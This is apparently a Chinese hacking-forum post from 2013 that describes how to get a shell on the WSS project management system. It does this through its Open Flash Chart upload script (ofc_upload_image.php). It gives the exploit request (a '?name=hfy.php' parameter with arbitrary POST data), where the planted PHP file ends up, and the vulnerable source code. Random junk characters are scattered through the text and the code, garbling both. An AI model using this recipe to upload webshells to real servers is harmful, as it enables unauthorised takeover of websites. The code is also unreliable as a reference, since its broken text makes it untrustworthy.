标题: WSS项目管理系统Post get shell [打印本页] 作者: admin 时间: 2013-2-23 12:38 标题: WSS项目管理系统Post get shell POST 数据漏洞文件执行任意后缀文件保存6 g1 c% J* I) U' Z1 x) G
漏洞文件/chart/php-ofc-library/ofc_upload_image.php . ?" K3 a4 d1 X- g x4 F2 O& L % \2 x/ B: A Z$ P; z: U利用: $ s3 n4 r% }$ w! N# T8 z7 i% R/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名5 b& S& P; U$ w# g$ g& ?: ^ K% W
* {* x) k( C. s. a+ y- V; u( c
Post任意数据8 `- Y7 I$ P/ f/ c
保存位置http://localhost/chart/tmp-upload-images/hfy.php . r! @, D+ I# R5 u' M$ _% Y[attach]201[/attach]# D) {% J% a) r) m- f) ]& Q# o
[attach]202[/attach] ) l9 O; d9 A5 w- e+ u t' [0 [最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~. y, {6 A q7 n
, P) E3 Y2 u r
<?php! [/ B6 T2 Q& y0 Z- N8 N7 Y( P/ l: W
* `1 M: j' E, `- \& D
//$ ?3 n/ `' w0 G* _
// In Open Flash Chart -> save_image debug mode, you # t$ B6 c# i O y8 A// will see the 'echo' text in a new window. h3 i* G/ T" G5 u: \0 r6 \
// # g; N1 H5 P+ `3 ]# V; h: q# w1 u, |. H: i0 x$ q
/* ' ^+ `/ R0 Q' U/ k7 s2 j8 s' W 2 B5 s2 S& O0 _print_r( $_GET );* X0 ~+ E1 I+ i- G3 p8 B: W+ L0 |
print_r( $_POST );6 Z" _% H' x/ C! I6 L3 G" M8 F
print_r( $_FILES );7 l6 L3 `% |+ t( ]6 B. f* c/ w
4 R" F9 x/ ?3 b# e) |( x
print_r( $GLOBALS ); # A$ N: a, S, C9 kprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );* S# I3 W- l) p, a9 f. S
1 j4 A+ H. w6 H8 G. _( x6 k8 ?*/0 q% y j& N6 B* p
// default path for the image to be stored //6 c2 G& Y* a" N+ {0 p8 }5 p
$default_path = '../tmp-upload-images/'; ! g# Z2 q X' J/ p- c0 A! w( z1 \5 }% c: j) X' R2 q# f
if (!file_exists($default_path)) mkdir($default_path, 0777, true); ) W, u8 T4 Q! a- X2 }" W+ s+ o! Y6 u6 d; z' ?: v
// full path to the saved image including filename //5 s5 }( t3 Y0 H
$destination = $default_path . basename( $_GET[ 'name' ] ); 0 R9 P7 z) l0 h. H& z- A ~* E7 c. u8 o- Q. v* u+ r, s: j2 @
echo 'Saving your image to: '. $destination; 8 h6 y, j0 n) m$ V! z// print_r( $_POST );* H; [3 E" C1 {/ {" K! Y8 J
// print_r( $_SERVER );* Q" D1 B! L, U* M
// echo $HTTP_RAW_POST_DATA;8 H/ F) F: U5 G0 q$ K! s3 r5 [
+ |& c$ {; d+ s: l// 9 |! m: ]( ?/ ?, I1 D// POST data is usually string data, but we are passing a RAW .png ( k6 x% j+ Y3 [4 [// so PHP is a bit confused and $_POST is empty. But it has saved : V/ _) k! X5 n// the raw bits into $HTTP_RAW_POST_DATA3 Y' }' A0 V5 z8 C; j
//5 |9 _4 S n1 c3 {% t' Z) ?
3 U D$ m( o# s% w2 b+ |) K+ U; X% q
$jfh = fopen($destination, 'w') or die("can't open file");+ C6 `0 P4 Q- y- I% x- u- q3 C2 h3 M3 H
fwrite($jfh, $HTTP_RAW_POST_DATA);. ?0 S& S% x: k3 Y t |/ G
fclose($jfh); 3 o ]: @- Z; Q j( c. a% ? ' s! j! U* w2 h# E1 j x//9 j w+ V7 C; X; m
// LOOK: 4 q; |( b( e8 r3 ^. @1 k//& g5 Y9 o1 w) i9 O- t$ Y
exit(); ' k1 C, [3 R9 a. D! {5 ]; v// 8 V. i% P( o8 \// PHP5:+ N; S. {* t0 B
// ( J. u9 K j7 A; j& {& {- v) N, z' y' H. f' G5 Y! N
! `) B6 k- [% C( j) g9 B// default path for the image to be stored // 4 I3 }5 _0 S5 r$default_path = 'tmp-upload-images/';1 b' B {$ M, J5 _/ h2 E/ f
4 Z3 C' U Z9 S2 d+ \0 ?if (!file_exists($default_path)) mkdir($default_path, 0777, true); 5 V/ B: y8 E$ O7 w( R6 l' J& o: y( e/ ^) f& u6 h; j
// full path to the saved image including filename // 3 x. O6 c8 x. ~6 I! {$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 3 B# J/ H9 D2 q! |4 ~) E/ Y4 g2 C& i, }/ s5 Q4 w _
// move the image into the specified directory // 3 u; a7 \: M; e6 @% ^9 jif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {3 u: w& x; z6 w1 Q/ j
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;"; 1 n# ^$ s( g1 K2 T/ K$ g9 w} else {2 B' B5 X' b0 c$ F {
echo "FILE UPLOAD FAILED"; : l2 e9 w7 M9 d5 s* Q}1 m. z3 k+ g1 Y7 ?
1 Z a% m5 {5 k' Z* u1 j% Y" M1 ?
* j% s. _" l! z: q* [( x- Q w9 b?> ! P" }! o, q @( A3 b. s/ Y# Z+ y2 \7 l; d' B( C
" P; d, ?7 d7 k0 l, Z0 Y; S" f1 u. ?" t3 n+ v; X* { }
" }6 F/ U: [ x( K& y( s! b. K
[attach]203[/attach]$ a; g& d- B* N